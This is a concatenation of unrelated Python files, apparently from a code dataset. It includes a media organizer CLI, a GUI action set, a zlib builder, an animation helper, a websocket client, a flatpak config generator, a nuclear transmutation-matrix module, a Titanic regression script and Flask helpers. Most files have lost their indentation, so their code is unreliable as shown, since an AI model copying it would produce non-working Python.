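#
# The top-level directory name "faces" is an assumption for illustration only.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    processUnencoded("faces")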
|
python
|
from os import path
import click
from glob import glob
from pathlib import Path
from app.newAnimeEpisodes import *
@click.command()
@click.option('--source', required=True, type=str, help='Enter absolute path of directory to move from')
@click.option('--destination', required=True, type=str, help='Enter absolute path of directory to move to')
@click.option('--parse', default=False, is_flag=True, required=True, help='Will parse the filenames for files in a given directory via regex. The parser will remove any brackets and characters within the brackets, replace underscores with spaces, and remove any dash characters (-) and characters following the dash. This will not rename the file.')
@click.option('--age', default=False, is_flag=True, required=False, help='Checks file age and compares it to a specified accepted time interval set by `acceptedFileAge`')
@click.option('--move', default=False, is_flag=True, required=True, help='Moves the file in a directory to another directory that is specified.')
def organize(source, destination, parse, age, move):
'''
Organizes media files in one directory to another directory.
Reisen will look for a matching directory with a parsed name of the filenames in the base directory.
Reisen will then either move the file if there is a match, or create a directory and then move the file.
'''
types = ('.avi', '.mkv', '.mp4')
initialDir = os.listdir(source)
initialDirGlob = glob(str(source) + '/**/', recursive=True)
if parse and age and move:
setMinutes = age
if not initialDir:
click.echo(colorText(f'ERROR: ')[2] + 'Empty directory. Please double check that you specified the right path. \n')
else:
for dir in initialDirGlob:
filePath = os.listdir(dir)
for originalFileName in filePath:
if os.path.isdir(source + '/' + originalFileName)==False and not originalFileName.endswith( types ):
click.echo(colorText(f'\nERROR: ')[2] + f'Found file that does not end in file types: ')
click.echo(colorText(f'{types}')[1] + '\n')
click.echo(f'Skipping file: ' + colorText(f'{originalFileName}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif originalFileName.endswith( types ):
newFileName = parsedFilename(str(originalFileName)).parse()
fileInfo = checkAge(originalFileName, setMinutes, dir).check()
runFileActions = moveFile(str(newFileName), str(originalFileName), dir, destination, fileInfo)
runFileActions.moveToDir()
elif os.path.isdir(source + '/' + originalFileName)==True and len(os.listdir(source + '/' + originalFileName)) == 0:
click.echo(colorText(f'\nWARNING: ')[2] + f'Found objects that are not video files or empty directories in: ')
click.echo(colorText(f'\n{source}\n')[0])
click.echo(f'Files or folders in question: ' + colorText(source + '/' + originalFileName)[1] + '\n ')
click.echo("Please double check your specified base directory and remove any files and/or empty directories that are not video files that match: ")
click.echo(colorText(f'{types}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif parse and move and not age:
if not initialDir:
click.echo(colorText(f'ERROR: ')[2] + 'Empty directory. Please double check that you specified the right path. \n')
else:
for dir in initialDirGlob:
filePath = os.listdir(dir)
for originalFileName in filePath:
fileInfo = None
if os.path.isdir(source + '/' + originalFileName)==False and not originalFileName.endswith( types ):
click.echo(colorText(f'\nERROR: ')[2] + f'Found file that does not end in file types: ')
click.echo(colorText(f'{types}')[1] + '\n')
click.echo(f'Skipping file: ' + colorText(f'{originalFileName}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif originalFileName.endswith( types ):
newFileName = parsedFilename(str(originalFileName)).parse()
runFileActions = moveFile(str(newFileName), str(originalFileName), dir, destination, fileInfo)
runFileActions.moveToDir()
elif os.path.isdir(source + '/' + originalFileName)==True and len(os.listdir(source + '/' + originalFileName)) == 0:
click.echo(colorText(f'\nWARNING: ')[2] + f'Found objects that are not video files or empty directories in: ')
click.echo(colorText(f'\n{source}\n')[0])
click.echo("Please double check your specified base directory and remove any files and/or empty directories that are not video files that match: ")
click.echo(colorText(f'{types}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif parse and not move and not age:
click.echo(f'{colorText("ERROR")[2]}: Missing option flag {colorText("--move")[2]}.\n ')
elif move and not parse and not age:
click.echo(f'{colorText("ERROR")[2]}: Missing option flag {colorText("--parse")[2]}.\n ')
elif source is None or destination is None:
click.echo(f'{colorText("ERROR")[2]}: Missing parameters in options for {colorText("--source")[2]} and {colorText("--destination")[2]}. \n\nMake sure if you specify something with "--" you also pass a value. Check {colorText("--help")[1]} or {colorText("-h")[1]} for help.\n')
else:
click.echo('WAAAAAAAAAAAAAAAAACK')
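# --- Hedged usage sketch (added note, not part of the original module) --------
# Assuming the click command above is exposed as a console script (the actual
# entry-point name is not shown here; "reisen" is a guess from the docstring),
# a typical invocation would look like:
#
#   reisen --source /downloads/anime --destination /media/anime --parse --move
#
# Add --age to also require files to be older than the configured interval
# before they are moved.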
|
python
|
""" A test action set. """
# Enthought library imports.
from envisage.ui.action.api import Action, Group, Menu, ToolBar
from envisage.ui.workbench.api import WorkbenchActionSet
class TestActionSet(WorkbenchActionSet):
""" An action test useful for testing. """
#### 'ActionSet' interface ################################################
# The action set's globally unique identifier.
id = 'envisage.ui.workbench.test'
menus = [
Menu(
name='&Test', path='MenuBar', before='Help',
groups=['XGroup', 'YGroup']
),
Menu(
name='Foo', path='MenuBar/Test',
groups=['XGroup', 'YGroup']
),
Menu(
name='Bar', path='MenuBar/Test',
groups=['XGroup', 'YGroup']
),
]
groups = [
Group(id='Fred', path='MenuBar/Test')
]
tool_bars = [
ToolBar(name='Fred', groups=['AToolBarGroup']),
ToolBar(name='Wilma'),
ToolBar(name='Barney')
]
actions = [
Action(
path='MenuBar/Test', group='Fred',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='MenuBar/Test', group='Fred',
class_name='acme.workbench.action.new_view_action:NewViewAction'
),
Action(
path='ToolBar',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar',
class_name='envisage.ui.workbench.action.api:ExitAction'
),
Action(
path='ToolBar/Fred', group='AToolBarGroup',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar/Wilma',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar/Barney',
class_name='envisage.ui.workbench.action.api:ExitAction'
)
]
#### 'WorkbenchActionSet' interface #######################################
# The Ids of the perspectives that the action set is enabled in.
enabled_for_perspectives = ['Foo']
# The Ids of the perspectives that the action set is visible in.
visible_for_perspectives = ['Foo', 'Bar']
# The Ids of the views that the action set is enabled for.
#enabled_for_views = ['Red']
# The Ids of the views that the action set is visible for.
#visible_for_views = ['Red']
#### EOF ######################################################################
|
python
|
"""This module provide the builder for the zlib library."""
import logging
from nvp.components.build import BuildManager
from nvp.nvp_builder import NVPBuilder
logger = logging.getLogger(__name__)
def register_builder(bman: BuildManager):
"""Register the build function"""
bman.register_builder('zlib', Builder(bman))
class Builder(NVPBuilder):
"""zlib builder class."""
def build_on_windows(self, build_dir, prefix, _desc):
"""Build on windows method"""
self.run_cmake(build_dir, prefix, ".")
self.run_ninja(build_dir)
def build_on_linux(self, build_dir, prefix, desc):
"""Build on linux method"""
self.run_cmake(build_dir, prefix, ".")
self.run_ninja(build_dir)
|
python
|
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def animale_array(xm,fname,lbls=None,cmap='gray',figsize=(7,7),fps=25,vmin=None,vmax=None):
'''
This function helps to make an animation from a (2+1)-d array indexed as (t, y, x); each xm[i, :, :] frame is rendered with imshow
'''
# from IPython.display import HTML
fig, ax = plt.subplots(figsize=figsize)
ax.set_xlim((0, xm.shape[1]))
ax.set_ylim((0, xm.shape[2]))
ax.axis('off')
if not lbls is None:
plt.title(lbls[0],fontsize=10)
plt.tight_layout()
im = ax.imshow(np.flipud(xm[0,:,:]),cmap=cmap,vmin=vmin,vmax=vmax)
pbar = tqdm(total=len(xm))
def init():
im.set_data(np.flipud(xm[0,:,:]))
if not lbls is None:
plt.title(lbls[0],fontsize=10)
return (im,)
# animation function. This is called sequentially
def animate(i):
pbar.update(1)
data_slice = np.flipud(xm[i,:,:])
im.set_data(data_slice)
if not lbls is None:
plt.title(lbls[i],fontsize=10)
return (im,)
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=xm.shape[0], interval=200, blit=True)
# HTML(anim.to_html5_video())
# Set up formatting for the movie files
Writer = animation.writers['ffmpeg']
writer = Writer(fps=fps, metadata=dict(artist='Me'), bitrate=1000)
anim.save(fname+'.mp4', writer=writer)
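# --- Hedged usage sketch (added note, not part of the original module) --------
# Minimal smoke test: animate a short stack of random 64x64 frames. Writing the
# .mp4 requires ffmpeg to be visible to matplotlib; the output name "demo" is
# arbitrary.
if __name__ == "__main__":
    frames = np.random.rand(10, 64, 64)
    labels = ["frame %d" % i for i in range(10)]
    animale_array(frames, "demo", lbls=labels, fps=5)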
|
python
|
import asyncio
import json
import logging
import random
import time
import uuid
import websockets
from common import Client, ClientReport, OffsetTransform, Position, Rotation
logging.basicConfig(level=logging.INFO)
TIME_BETWEEN_UPDATES = 0.0166
LOW_POSITION = -3.0
HIGH_POSITION = 3.0
LOW_ROTATION = 0.0
HIGH_ROTATION = 360
client = Client(
name=str(uuid.uuid4()),
timestamp=time.time()
)
def randomize_offset_values():
if client.offset_transform is None:
client.offset_transform = OffsetTransform(
Position(
(random.uniform(LOW_POSITION, HIGH_POSITION),
random.uniform(LOW_POSITION, HIGH_POSITION),
random.uniform(LOW_POSITION, HIGH_POSITION))
),
Rotation(
(random.uniform(LOW_ROTATION, HIGH_ROTATION),
random.uniform(LOW_ROTATION, HIGH_ROTATION),
random.uniform(LOW_ROTATION, HIGH_ROTATION))
)
)
async def hello():
uri = "ws://0.0.0.0:6789"
async with websockets.connect(uri, ping_interval=None) as websocket:
client_report = ClientReport(client)
client_connection_message = dict(client_report.to_dict())
client_connection_message["type"] = "connect"
await websocket.send(json.dumps(client_connection_message))
while True:
randomize_offset_values()
client.timestamp = time.time()
client_report = ClientReport(client)
client_sync_message = dict(client_report.to_dict())
client_sync_message["type"] = "sync"
await websocket.send(json.dumps(client_sync_message))
greeting = await websocket.recv()
logging.info(greeting)
await asyncio.sleep(TIME_BETWEEN_UPDATES)
asyncio.get_event_loop().run_until_complete(hello())
asyncio.get_event_loop().run_forever()
|
python
|
import logging
import os
from pathlib import Path
from flatpaksync.commands.command import command
from flatpaksync.configs.write import write as writeconfig
from flatpaksync.structs.app import app
from flatpaksync.structs.settings import settings
from flatpaksync.actions.app import app as appaction
from flatpaksync.parsers.repo import repo as parserepo
from flatpaksync.parsers.app import app as parseapp
from flatpaksync.actions.repo import repo as repoaction
mylog = logging.getLogger("fps")
class generate(command):
def __init__(self):
super().__init__()
def execute(self):
if self.conf.endswith(".config/flatpak-sync/flatpak.json"):
confPath = os.path.dirname(os.path.realpath(self.conf))
Path(confPath).mkdir(parents=True, exist_ok=True)
# Get Installed Repos
raction = repoaction()
output = raction.list()
rparse=parserepo()
rparse.parse(output)
# Get Installed Apps
action = appaction()
output = action.list()
parse = parseapp()
if parse.parse(output):
fpsettings = settings()
applist = parse.getAppList()
repolist = rparse.getRepoList()
# Write configuration
wconfig = writeconfig(self.conf)
wconfig.setSettings(fpsettings)
wconfig.setRepoList(repolist)
wconfig.setAppList(applist)
if wconfig.write():
mylog.info('Successfully wrote configuration')
else:
mylog.error('Failed to write configuration')
else:
mylog.error('Failed to parse apps')
|
python
|
"""generatedata
Function that collects the transmutation data and
prepares the transmutation matrix required for depletion or decay
calculations.
The following reactions are considered:
- Radiative capture
- Capture to ground state
- Capture to metastable
- n, 2n
- n, 3n
- Fission
- n, alpha
- n, proton
- n, deuteron
- n, tritium
Created on Sat Oct 09 11:30:00 2021 @author: Dan Kotlyar
Last updated on Sat Oct 16 00:30:00 2021 @author: Dan Kotlyar
"""
import numpy as np
import numbers
from pyIsoDep import setDataPath
from pyIsoDep.functions.loaddecaydata import DecayData
from pyIsoDep.functions.checkerrors import _exp2dshape, _is1darray,\
_isequallength, _isnonNegativeArray, _is2darray, _inrange
from pyIsoDep.functions.header import H5_PATH, BARN_2_CM2, JOULE_2MEV,\
IDX_XS, DATA_ATTR
class TransmutationData:
"""Container to store all the information required to perform depletion
The decay data can be read from a pre-generated hdf5 file. The latter
also includes fission yields and branching ratios.
Cross sections can be directly read via the ``read`` method.
If fission yields or branching ratios are provided then they will be used
to overwrite existing values within the library.
Parameters
----------
libraryFlag : bool
A flag to indicate whether a pre-generated library is used.
h5path : str
Full directory path to the hdf5 data library file
wgtFY : float
fission yield weighting factor between the thermal and fast fission
yields, i.e. <fy> = wgt*fyThermal + (1-wgt)*fyFast. Only used when the
pre-generated library is loaded; otherwise it is a redundant parameter.
Attributes
----------
fullId : 1-dim array
Nuclides ZAID number (e.g., 541350)
nIsotopes : int
Number of isotopes
AW : 1-dim array
Atomic weight
Q : 1-dim array
Decay heat coefficient for each isotope in W/Bq
BR : 1-dim array
branching ratio that leads to an isomeric state
lmbda : 1-dim array
decay constants in 1/sec
decaymtx : 2-dim array
Decay matrix
ingestion : 1-dim array
Ingestion coefficients in Sv/Bq
inhalation : 1-dim array
Inhalation coefficients in Sv/Bq
fymtx : 2-dim array
fission yields matrix for all parent-daughter isotope pairs
Returns
-------
2-dim array
Transmutation matrix
Examples
--------
>>> xs = TransmutationData(libraryFlag=True)
"""
def __init__(self, libraryFlag=True, h5path=None, wgtFY=0.0):
"""reset values with a complete list of all the nuclides"""
self.libraryFlag = libraryFlag
# load the decay data
if libraryFlag:
if h5path is None:
h5DefaultPath = setDataPath(H5_PATH)
datalib = DecayData(h5DefaultPath)
else:
datalib = DecayData(h5path)
_inrange(wgtFY, "Fission yield weight", [0.0, 1.0])
self.fullId = np.array(datalib.getvalues("IDlist"), dtype=int)
self.nIsotopes = len(self.fullId)
self.AW = datalib.getvalues("AW")
self.Q = datalib.getvalues("Q")
self.BR = datalib.getvalues("BR")
self.lmbda = datalib.getvalues("lambda")
self.decaymtx = datalib.getvalues("decayMatrix")
self.ingestion = datalib.getvalues("ingestion")
self.inhalation = datalib.getvalues("inhalation")
self.fymtx = wgtFY*datalib.getvalues("thermalFY") +\
(1-wgtFY)*datalib.getvalues("fastFY")
else:
self.fullId = None
self.nIsotopes = None
self.AW = None
self.Q = None
self.BR = None
self.lmbda = None
self.decaymtx = None
self.ingestion = None
self.inhalation = None
self.fymtx = None
def ReadData(self, ID, sig_f, sig_c, sig_c2m=None, sig_n2n=None,
sig_n3n=None, sig_alpha=None, sig_p=None, sig_d=None,
sig_t=None, fymtx=None, EfissMeV=None, BR=None,
decaymtx=None, flagBarns=True):
"""Read data and build the transmutation matrix
Parameters
----------
ID : 1-dim array
Partial array of nuclides for which cross sections are provided
sig_f : 1-dim array
Fission cross sections in barns
sig_c : 1-dim array
Radiative capture cross sections in barns
sig_c2m : 1-dim array
Radiative capture cross sections leading to metastable in barns
sig_n2n : 1-dim array
n, 2n in barns
sig_n3n : 1-dim array
n, 3n in barns
sig_alpha : 1-dim array
(n, alpha) in barns
sig_p : 1-dim array
(n, proton) in barns
sig_d : 1-dim array
(n, deuteron) in barns
sig_t : 1-dim array
(n, tritium) in barns
EfissMeV : 1-dim array
fission energy in MeV for all the isotopes
BR : 1-dim array
Branching ratios that lead to an isomeric state
fymtx : 2-dim array
fission yields matrix for all parent-daughter isotope pairs
decaymtx : 2-dim array
decay matrix
flagBarns : bool
if True, cross sections are provided in barns; otherwise in cm**2
Returns
-------
2-dim array
Transmutation matrix
Raises
------
KeyError
If any of the arrays is not an array.
TypeError
If any of the arrays is not an array.
ValueError
If any of the arrays have negative values or are not of equal size
Examples
--------
>>> xs = TransmutationData(libraryFlag=True)
>>> xs.ReadData(ID, sig_f, sig_c)
"""
# store the 1-group cross sections in a matrix
# ---------------------------------------------------------------------
xsData =\
self._storexs(ID, sig_f, sig_c, sig_c2m, sig_n2n, sig_n3n,
sig_alpha, sig_p, sig_d, sig_t, fymtx, EfissMeV, BR,
decaymtx, flagBarns)
# For each parent define the products for all the possible reactions
# e.g. 922350 absorbs a neutron and leads to 922360
# ---------------------------------------------------------------------
# the starting index corresponds to the radiative capture reaction idx
idxC = IDX_XS["c"]
# empty matrix to store products ID's
prodcutsIDs = np.zeros((self.nIsotopes, len(IDX_XS)-idxC))
# change ID for isomers to find correct daughters
parents = np.around(self.fullId, -1)
prodcutsIDs[:, IDX_XS["c"]-idxC] = parents + 10 # n,c - ground
prodcutsIDs[:, IDX_XS["c2m"]-idxC] = parents + 11 # n,c - meta
prodcutsIDs[:, IDX_XS["n2n"]-idxC] = parents - 10 # n,2n
prodcutsIDs[:, IDX_XS["n3n"]-idxC] = parents - 20 # n,3n
prodcutsIDs[:, IDX_XS["alpha"]-idxC] = parents - 20030 # alpha
prodcutsIDs[:, IDX_XS["p"]-idxC] = parents - 10000 # proton
prodcutsIDs[:, IDX_XS["d"]-idxC] = parents - 10010 # deuteron
prodcutsIDs[:, IDX_XS["t"]-idxC] = parents - 10020 # tritium
prodcutsIDs[prodcutsIDs < 100] = 0
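# Illustrative example (added note): for U-235 the ZAID is 922350, so the
# rounded parent is 922350 and the product IDs built above are
#   radiative capture (ground): 922350 + 10    -> 922360 (U-236)
#   radiative capture (meta):   922350 + 11    -> 922361 (U-236m)
#   n,2n:                       922350 - 10    -> 922340 (U-234)
#   n,alpha:                    922350 - 20030 -> 902320 (Th-232)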
# Create the 1-g transmutation matrix (without fission components)
# ---------------------------------------------------------------------
trmtx = np.zeros((self.nIsotopes, self.nIsotopes))
# fill diagonal with negative absorption values
np.fill_diagonal(trmtx, -xsData[:, IDX_XS["abs"]])
for idxrow in range(self.nIsotopes):
for idxcol, product in enumerate(prodcutsIDs[idxrow, :]):
trmtx[self.fullId == product, idxrow] =\
xsData[idxrow, idxcol+idxC]
# Create the product between fission yields and fission cross sections
# ---------------------------------------------------------------------
fissmtrx = np.tile(xsData[:, IDX_XS["f"]], (self.nIsotopes, 1))
fissmtrx *= self.fymtx
# Final transmutation matrix
# ---------------------------------------------------------------------
trmtx += fissmtrx
self.transmutationmtx = trmtx
def Condense(self, ID, printWarnings=False):
"""Condense all the data to contain only a given list of isotopes
Parameters
----------
ID : 1-dim array
List of nuclides
printWarnings : bool
Flag to indicate whether warnings should be printed
Raises
------
ValueError
If any of the arrays have negative values or are not of equal size
"""
# Check that ID is a non-negative 1-dim array
# ---------------------------------------------------------------------
ID = np.array(ID)
_is1darray(ID, "ID array")
_isnonNegativeArray(ID, "ID array")
# intersect between the full and given list of nuclides
# ---------------------------------------------------------------------
vals, idxFull, idxPart =\
np.intersect1d(self.fullId, ID, assume_unique=True,
return_indices=True)
# filter the data according to the provided ID array
# ---------------------------------------------------------------------
attrFlag = False
for attr in DATA_ATTR.keys():
if hasattr(self, attr):
attrFlag = True
val = getattr(self, attr)
if isinstance(val, numbers.Real):
setattr(self, attr, len(idxPart))
elif val.ndim == 1:
setattr(self, attr, val[idxFull])
elif attr == "xsData":
setattr(self, attr, val[idxFull, :])
else: # 2-dim array
setattr(self, attr, val[:, idxFull][idxFull, :])
else:
if printWarnings:
print("No attribute <{}> in the container".format(attr))
if not attrFlag:
raise ValueError("No attributes at all within the class")
def _storexs(self, ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n,
sig_alpha, sig_p, sig_d, sig_t, fymtx, EfissMeV, BR,
decaymtx, flagBarns):
"""store all the cross section in a specific format"""
# get all the cross sections in a single matrix (includes IDs)
# get the fission energy, fission yields matrix, and decay matrix
xsDataPart, EfissMeVPart, fymtxPart, decaymtxPart = _checkxs(
ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n, sig_alpha, sig_p,
sig_d, sig_t, fymtx, EfissMeV, BR, decaymtx, flagBarns)
# External data library is not provided
if not self.libraryFlag:
nIsotopes = len(ID)
self.fullId = ID
self.nIsotopes = nIsotopes
self.xsData = xsDataPart
self.EfissMeV = EfissMeVPart
self.EfissJoule = EfissMeVPart / JOULE_2MEV
self.fymtx = fymtxPart
self.decaymtx = decaymtxPart
return xsDataPart
# intersect between the full and partial list of nuclides
vals, idxFull, idxPart =\
np.intersect1d(self.fullId, ID, assume_unique=True,
return_indices=True)
# Build a matrix to store cross sections for the full list of nuclides
xsData = np.zeros((self.nIsotopes, len(IDX_XS)))
xsData[idxFull, :] = xsDataPart[idxPart, :] # populate the data
# Energy per fission for all the nuclides
EfissMeV = np.zeros(self.nIsotopes)
EfissMeV[idxFull] = EfissMeVPart[idxPart]
EfissJoule = EfissMeV / JOULE_2MEV # convert MeV to Joules
# Split the capture cross section between ground and metastable states using
# the library branching ratios when the user did not provide BR
if BR is None:
xsData[:, IDX_XS["c2m"]] = xsData[:, IDX_XS["c"]] * self.BR
xsData[:, IDX_XS["c"]] = xsData[:, IDX_XS["c"]] * (1 - self.BR)
# Embed a user-provided fission yields matrix into the full-size matrix
if fymtxPart is not None:
fymtx = np.zeros((self.nIsotopes, self.nIsotopes))
for idx in range(len(idxFull)):
fymtx[idxFull, idxFull[idx]] = fymtxPart[idxPart, idxPart[idx]]
self.fymtx = fymtx
# Store the matrix with the cross sections
self.xsData = xsData
self.EfissMeV = EfissMeV
self.EfissJoule = EfissJoule
return xsData
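# Hedged usage sketch (mirrors the docstring example above; keyword names and the
# cross-section values are illustrative placeholders, not evaluated data):
# xs = TransmutationData(libraryFlag=True)
# xs.ReadData(ID=[922350, 922380], sig_f=[40.0, 0.05], sig_c=[9.0, 2.7], flagBarns=True)
# xs.Condense([922350, 922380]) # keep only the listed nuclides in all stored arrays
# A = xs.transmutationmtx # 1-group transmutation matrix (cm**2 when flagBarns=True)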
# -----------------------------------------------------------------------------
# Supplementary functions to check errors
# -----------------------------------------------------------------------------
def _checkxs(ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n, sig_alpha, sig_p,
sig_d, sig_t, fymtx, EfissMeV, BR, decaymtx, flagBarns):
"""check that all the cross sections are properly provided"""
_is1darray(ID, "Nuclides Ids")
numN = len(np.unique(ID)) # number of unique isotopes
_isequallength(ID, numN, "Nuclides Ids")
ID = np.array(ID, dtype=int)
if sig_c is None:
sig_c = np.zeros(numN)
else:
sig_c = np.array(sig_c)
if sigc2m is None:
sigc2m = np.zeros(numN)
else:
sigc2m = np.array(sigc2m)
if sig_n2n is None:
sig_n2n = np.zeros(numN)
else:
sig_n2n = np.array(sig_n2n)
if sig_n3n is None:
sig_n3n = np.zeros(numN)
else:
sig_n3n = np.array(sig_n3n)
if sig_f is None:
sig_f = np.zeros(numN)
else:
sig_f = np.array(sig_f)
if sig_alpha is None:
sig_alpha = np.zeros(numN)
else:
sig_alpha = np.array(sig_alpha)
if sig_p is None:
sig_p = np.zeros(numN)
else:
sig_p = np.array(sig_p)
if sig_d is None:
sig_d = np.zeros(numN)
else:
sig_d = np.array(sig_d)
if sig_t is None:
sig_t = np.zeros(numN)
else:
sig_t = np.array(sig_t)
if EfissMeV is None:
EfissMeV = _FissionEnergy(ID)
else:
EfissMeV = np.array(EfissMeV, dtype=float)
if BR is not None:
BR = np.array(BR)
# check if all variables are 1-dim arrays
_is1darray(sig_c, "Capture XS")
_is1darray(sigc2m, "Capture to metastable XS")
_is1darray(sig_n2n, "(n, 2n) XS")
_is1darray(sig_n3n, "(n, 3n) XS")
_is1darray(sig_f, "(n, fission) XS")
_is1darray(sig_alpha, "(n, alpha) XS")
_is1darray(sig_p, "(n, proton) XS")
_is1darray(sig_d, "(n, deuteron) XS")
_is1darray(sig_t, "(n, tritium) XS")
_is1darray(EfissMeV, "Fission energy in MeV")
if BR is not None:
_is1darray(BR, "Branching ratios")
if fymtx is not None:
fymtx = np.array(fymtx)
_is2darray(fymtx, "Fission yields matrix")
if decaymtx is not None:
decaymtx = np.array(decaymtx)
_is2darray(decaymtx, "Decay matrix")
# check that all variables are with the same size
_isequallength(sig_c, numN, "Capture XS")
_isequallength(sigc2m, numN, "Capture to metastable XS")
_isequallength(sig_n2n, numN, "(n, 2n) XS")
_isequallength(sig_n3n, numN, "(n, 3n) XS")
_isequallength(sig_f, numN, "(n, fission) XS")
_isequallength(sig_alpha, numN, "(n, alpha) XS")
_isequallength(sig_p, numN, "(n, proton) XS")
_isequallength(sig_d, numN, "(n, deuteron) XS")
_isequallength(sig_t, numN, "(n, tritium) XS")
_isequallength(EfissMeV, numN, "Fission energy in MeV")
if BR is not None:
_isequallength(BR, numN, "Branching ratios")
if fymtx is not None:
_exp2dshape(fymtx, (numN, numN), "Fission yields matrix")
if decaymtx is not None:
_exp2dshape(decaymtx, (numN, numN), "Decay matrix")
# check if all variables do not contain negative values
_isnonNegativeArray(sig_c, "Capture XS")
_isnonNegativeArray(sigc2m, "Capture to metastable XS")
_isnonNegativeArray(sig_n2n, "(n, 2n) XS")
_isnonNegativeArray(sig_n3n, "(n, 3n) XS")
_isnonNegativeArray(sig_f, "(n, fission) XS")
_isnonNegativeArray(sig_alpha, "(n, alpha) XS")
_isnonNegativeArray(sig_p, "(n, proton) XS")
_isnonNegativeArray(sig_d, "(n, deuteron) XS")
_isnonNegativeArray(sig_t, "(n, tritium) XS")
_isnonNegativeArray(EfissMeV, "Fission energy in MeV")
if BR is not None:
_isnonNegativeArray(BR, "Branching ratios")
if fymtx is not None:
_isnonNegativeArray(fymtx, "Fission yields matrix")
# builds xs data matrix to store all the cross sections
xsData = np.zeros((numN, len(IDX_XS)))
# Absorption cross section
sig_abs = sig_c + sigc2m + sig_n2n + sig_n3n + sig_f + sig_alpha + sig_p +\
sig_d + sig_t
if flagBarns:
convUnits = BARN_2_CM2
else:
convUnits = 1.0
xsData[:, IDX_XS["id"]] = ID
xsData[:, IDX_XS["abs"]] = sig_abs * convUnits
xsData[:, IDX_XS["c"]] = sig_c * convUnits
xsData[:, IDX_XS["c2m"]] = sigc2m * convUnits
xsData[:, IDX_XS["n2n"]] = sig_n2n * convUnits
xsData[:, IDX_XS["n3n"]] = sig_n3n * convUnits
xsData[:, IDX_XS["f"]] = sig_f * convUnits
xsData[:, IDX_XS["alpha"]] = sig_alpha * convUnits
xsData[:, IDX_XS["p"]] = sig_p * convUnits
xsData[:, IDX_XS["d"]] = sig_d * convUnits
xsData[:, IDX_XS["t"]] = sig_t * convUnits
if BR is not None:
xsData[:, IDX_XS["c2m"]] = sig_c * BR
xsData[:, IDX_XS["c"]] = sig_c * (1 - BR)
return xsData, EfissMeV, fymtx, decaymtx
# Obtain the energy per fission for the defined isotopes
# -------------------------------------------------------------------------
def _FissionEnergy(ID):
"""Get the fission energy for the actinides (expression from ORIGEN)"""
idxNonFiss = ID < 900000 # indices for all the non-actinides
Z = np.floor(ID / 10000) # number of protons
A = np.floor((ID - Z * 10000) / 10) # num of protons+neutrons
energyFissMeV = 1.29927e-3 * (Z**2 * A**0.5) + 33.12
energyFissMeV[idxNonFiss] = 0.0
return energyFissMeV
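# Illustrative check of the fit above: U-235 (ID 922350, Z=92, A=235) gives
# 1.29927e-3 * (92**2 * 235**0.5) + 33.12 ~= 202 MeV per fission, while any ID
# below 900000 is treated as non-fissioning and forced to 0.0.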
|
python
|
import pandas as pd
from sklearn.metrics import r2_score
from sklearn.svm import SVR
MAX_AGE = 71
MAX_PCLASS = 3
def process_df(df):
df = df[['pclass', 'survived', 'age', 'sex']]
df = df.dropna()
df['pclass'] = df['pclass'].map(lambda x: float(x[:-2]) / MAX_PCLASS) # drop suffix
df['age'] = df['age'].map(lambda x: x / MAX_AGE)
def transform_to_num(df):
l = list({i for i in df})
return df.map(lambda x: l.index(x))
df['sex'] = transform_to_num(df['sex'])
return df
test = process_df(pd.read_csv('titanic_test.csv'))
train = process_df(pd.read_csv('titanic_train.csv'))
test_X, test_Y = test.drop(columns=['survived']), test['survived']
train_X, train_Y = train.drop(columns=['survived']), train['survived']
def score(kernel):
regr = SVR(kernel=kernel)
regr.fit(train_X, train_Y)
pred_Y = regr.predict(test_X)
print('%s, R2 score: %f' % (kernel, r2_score(test_Y, pred_Y)))
print('%s, Intercept: %f' % (kernel, regr.intercept_))
score('linear')
score('poly')
score('rbf')
|
python
|
import datetime
import calendar
from posixpath import dirname
import os
import pytz
import lockfile
import pycountry
import geoip2.errors
from flask.ext.babel import lazy_gettext
from flask import url_for
from flask.helpers import find_package
import rfk
def now():
return pytz.utc.localize(datetime.datetime.utcnow())
def to_timestamp(datetime):
return int(calendar.timegm(datetime.timetuple())) * 1000
def get_location(address):
try:
location = rfk.geoip.city(address)
except geoip2.errors.AddressNotFoundError:
return {}
ret = {}
if location.city.name is not None:
ret['city'] = location.city.name
if location.country.iso_code is not None:
try:
if location.country.iso_code == 'DE' and location.subdivisions[0].iso_code == 'BY':
ret['country_code'] = 'BAY'
elif location.country.iso_code == 'US' and location.subdivisions[0].iso_code == 'TX':
ret['country_code'] = 'TEX'
else:
ret['country_code'] = location.country.iso_code
except IndexError:
ret['country_code'] = location.country.iso_code
return ret
def get_path(path='', internal=False):
if os.path.isabs(path):
return path
prefix, package_path = find_package(__name__)
if prefix is not None and not internal:
return os.path.join(prefix, path)
elif package_path is not None:
return os.path.join(package_path, path)
raise ValueError
def natural_join(lst):
l = len(lst)
if l <= 2:
return lazy_gettext(' and ').join(lst)
elif l > 2:
first = ', '.join(lst[0:-1])
return "%s %s %s" % (first, lazy_gettext('and'), lst[-1])
def make_user_link(user):
return '<a href="%s" title="%s">%s</a>' % (url_for('user.info', user=user.username), user.username, user.username)
def iso_country_to_countryball(isocode):
"""returns the countryball for given isocode
omsk if file not found"""
if isocode is None:
return 'unknown.png'
if isocode == 'BAY':
isocode = 'bavaria'
elif isocode == 'TEX':
isocode = 'texas'
isocode = isocode.lower()
# rather dirty hack to get the path
basepath = os.path.join(dirname(dirname(__file__)), 'static', 'img', 'cb')
if rfk.CONFIG.has_option('site', 'cbprefix'):
prebasepath = os.path.join(basepath, rfk.CONFIG.get('site', 'cbprefix'))
if os.path.exists(os.path.join(prebasepath, '{}.png'.format(isocode))):
return '{}{}.png'.format(rfk.CONFIG.get('site', 'cbprefix'), isocode)
if os.path.exists(os.path.join(basepath, '{}.png'.format(isocode))):
return '{}.png'.format(isocode)
else:
return 'unknown.png'
